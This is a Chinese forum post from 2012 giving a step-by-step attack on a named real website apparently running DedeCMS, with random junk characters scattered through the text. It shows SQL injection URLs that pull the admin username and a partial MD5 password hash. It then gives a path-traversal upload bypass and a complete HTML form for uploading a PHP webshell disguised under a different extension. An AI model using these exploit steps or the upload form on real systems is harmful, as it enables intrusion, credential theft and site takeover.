①注入漏洞。, l1 s* R6 g# B) }6 }5 V' H
这站 http://www.political-security.com/. l+ I; I* r) r6 W. {' A
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,6 t& Z, I5 v6 K. V0 u
www.political-security.com/data/mysql_error_trace.inc 爆后台( v0 J8 M' ]1 l8 g: @$ o% z" D) O
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
7 Z X* b$ s6 a& T& H然后写上语句
& h$ e7 u5 Y9 }+ {查看管理员帐号
. ` V- [( m6 `+ j8 F4 ghttp://www.political-security.co ... &membergroup=@`( z) W: ?& F: Z8 f
$ m: o7 H+ B V- x
admin 3 w P+ b( z; F3 t5 p: `8 L
. u6 R2 U z( q' Q6 q) F5 G
查看管理员密码
2 s0 \6 }% {0 S `6 }4 S6 y5 J http://www.political-security.co ... &membergroup=@`
+ ]' _+ V0 o4 m) _3 T! D! J
7 b" S6 f/ r5 m: k' W d ?& M8d29b1ef9f8c5a5af429
" U' W2 u! f/ Z0 s8 D( R$ D6 |
1 s3 z* P; F4 U+ K. r% H查看管理员密码
1 G" \1 T, R7 H+ P: r, N7 d
/ u2 ` V8 p2 n, I6 M ^得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5" l1 D( N t2 M3 s7 D
1 y; k& I3 R" r8 _: R4 [1 O
8d2
5 o6 {; D6 `! N7 T9b1ef9f8c5a5af42
7 p3 |( _) k W# h3 W8 o9- t) J4 X: J9 L" e+ L
, T+ d |: n7 T9 C# U& rcmd5没解出来 只好测试第二个方法2 w2 p# }* T! e8 z% G3 ?! @
3 K* F% l4 ~2 |( ]8 K
/ U4 C! h" Z9 o4 n②上传漏洞:, W0 v. g7 Q" s c; P
/ O( w; N3 ?- X' L
只要登陆会员中心,然后访问页面链接9 }# F, G. a% y; o. H* Z3 Q0 d
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”+ l8 f2 W) [0 u1 ?
' x( K% M) G3 i2 C3 K1 L' \ T7 Y
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”' W! R/ u5 F: ~
) ?! v# G3 D! L, E
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm9 v' N9 v: G8 [9 ^0 L7 U
& F. N |+ g$ y- R
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
9 }3 \3 q) Y2 l" _* j+ m或者
. X% }1 S% M# }7 F' G即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对